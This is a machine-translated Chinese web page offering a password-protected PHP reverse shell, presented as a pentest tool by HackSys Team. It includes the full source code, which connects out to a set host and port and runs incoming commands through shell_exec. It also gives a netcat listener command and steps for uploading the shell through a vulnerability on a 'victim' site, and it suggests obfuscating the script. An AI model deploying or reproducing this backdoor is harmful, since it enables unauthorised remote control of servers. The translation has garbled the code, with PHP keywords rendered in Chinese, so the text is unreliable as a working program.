反向壳牌V1.0 PHP – 身份验证功能
产品按:
安萨里阿什法克
版本:
1.0
价格:
免费

评论者:
等级:
5
十月 9, 2012
上次修改:一月 18, 2013

总结:

反向连接PHP壳牌与内置的身份验证功能. 真棒的脚本,以保护您的后门.

介绍

 

此工具是专为pentest的情况下,你已经上传访问到Web服务器运行PHP.
上传这个脚本在web根目录下的某个地方,然后访问相应的URL在浏览器中运行. 该脚本将打开出站TCP连接的网络服务器在脚本中定义的主机和端口. 绑定到这个TCP连接将是一个shell.
 

这将是一个正确的交互式shell,您可以在其中运行像interective节目 远程登录SSH.
这个外壳有一个内置的身份验证功能,可以防止他人滥用后门.
它不同于基于Web表单的外壳,让你可以发送一个简单的命令, 然后回到你的输出.
 

修改源

 

1
2
3
$IP = “127.0.0.1"; #更改你的公共IP
$端口 = 4444;      #到港
$密码 = base64_decode("aGFja3N5c3RlYW0="); #默认密码: hacksysteam (MD5)

 

更改根据自己的需要和情况的值.
 

混淆源

 

一旦你做了修改, 你可以使用任何在线 PHP混淆 PHP脚本编码.
 

例子: http://www.codeeclipse.com/
 

之前混淆, 请根据自己的需要更改上述值.
 

设置NETCAT监听

 

启动一个netcat监听器上的主机和端口,这将是由Web服务器访问.
这里使用相同的端口,例如反向shell脚本中指定 (4444):
 

1
BT根@:〜# NC -lvvp 4444

 

上传脚本并执行

 

使用该漏洞发现你在网站上, 上载 reverse_shell.php.
运行该脚本,只需在您的Web浏览器中浏览到新上传的文件.
 

1
HTTP://<受害者IP>/<上传路径>/reverse_shell.php

 

注意: 网页上,你不会看到任何输出, 它继续在等待模式下,如果其成功.
 

掠夺你的shell

 

源代码

 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
<?PHP
###################################################
#               反向壳牌V1.0#
#             身份验证功能#
#                                                 #
#            Hacksys队 - 豹#
#             作者: 安萨里阿什法克 #
#            hacksysteam@hotmail.com#
#          HTTP://hacksys.vfreaks.com #
#              专为Linux #
#             由于lionaneesh#
#             lionaneesh@gmail.com#
###################################################

ini_set('max_execution_time仅仅',0);

$VERSION = “1.0";
$IP = “127.0.0.1"; #更改此
$端口 = 4444;      #更改此
$密码 = base64_decode(&quot;aGFja3N5c3RlYW0="); #默认密码: hacksysteam (MD5)

$旗帜 = ("
 _ _ _ _____
| |  | |          | |   / ____|                            
| |__| | __ ___| | _| (___ _ ___
|  __|/ _` |/ __| |/ /\___ \| | | / __|
| |  | | (_| | (__|   < ____) | |_| \__ \
|_|  |_|\__,_|\___|_|\_ _____ / __, |___ /
 _______ __ / |                                
|__ __|                      |___ /
   | | ___ __ __ __ ___
   | |/ _ \/ _` | '_`_ \
   | |  __ / (_| | | | | | |
   |_|\___|\__,_|_| |_| |_|
   
    在PHP反向壳牌
    作者: 安萨里阿什法克
   hacksysteam@hotmail.com
 HTTP://hacksys.vfreaks.com /"
);

$PWD = 函数shell_exec(“PWD");
$的sysinfo = 函数shell_exec(“uname-a的");
$ID = 函数shell_exec('ID | 切-D“(" -f 2 | 切-D“)" -f 1的');
$日 = 函数shell_exec(“日期");
$只 = 1337;
$信息 =
("
系统信息:$的sysinfo
当前工作目录: $PWD
用户组: $ID
当前日期和时间: $日
"
);

打印 "试图连接到: $IP 在端口 $端口 ...";

$sockfd中 = 的fsockopen($IP , $端口 , $errno的, $errstr );

如果($errno的 != 0)
  {
    打印 "****** 发生错误 ******错误nNumber的: $errno的错误字符串: $errstr";
    (0);
  }
其他 如果 (!$sockfd中)
  {
    打印 “致命 : 试图连接时发生意外错误!";
  }
其他
  {
    打印 “连接到: $IP 在端口 $端口 ...";
    FPUTS ($sockfd中 , $旗帜);
    FPUTS($sockfd中 ,“输入密码: ");
    $getpass的 = 修剪(与fgets($sockfd中, strlen的($密码) + 2));

    如果 ($getpass的 == $密码)
    {
      FPUTS($sockfd中, "验证全成。.");
      FPUTS($sockfd中, $信息);
      (!EOF($sockfd中))
      {
    $cmdPrompt = 修剪($ID) . “@" . 修剪($IP) . “:〜" . 修剪($PWD) . “# ";
    FPUTS ($sockfd中 , $cmdPrompt );
    $命令 = 修剪(与fgets($sockfd中, $只));
        如果 (修剪($命令) == “退出")
    {
      FPUTS($sockfd中 ,"由用户中止... 退出..." );
      FCLOSE($sockfd中);
      (0);
    }
    FPUTS($sockfd中 , "" . 函数shell_exec($命令) . "");
      }
      FCLOSE($sockfd中);
      (0);
    }
    其他
    {
      FPUTS($sockfd中 ,"无效的密码... 退出...");
      FCLOSE($sockfd中);
      (0);
    }
  }
?>

 

截图

 


 

下载反向壳牌V1.0 PHP – 身份验证功能

 

Reverse_Shell_v1.0.zip

 
 
 

21,005 总的看法, 13 今日观点

下面的两个选项卡下面的内容转变.

安萨里阿什法克

安全研究员
阿什法克安萨里是创始人 HackSys队 代号为 "豹". 他是一位安全研究人员在信息安全的各个方面的经验. 他曾撰写 "HackSys极端脆弱的驱动程序" 和 "死亡的shellcode". 他还撰写并出版了低层次软件开发的各种白皮书. 他的核心利益在于 "低水平开发", "逆向工程", "项目分析" 和 "混合起毛". 他是人工智能和机器学习的变形金刚迷. 他是章负责人 空普纳.

阿什法克安萨里的最新文章 (查看全部)

发表评论

您的电子邮件地址不会被公开. 必需字段标记 *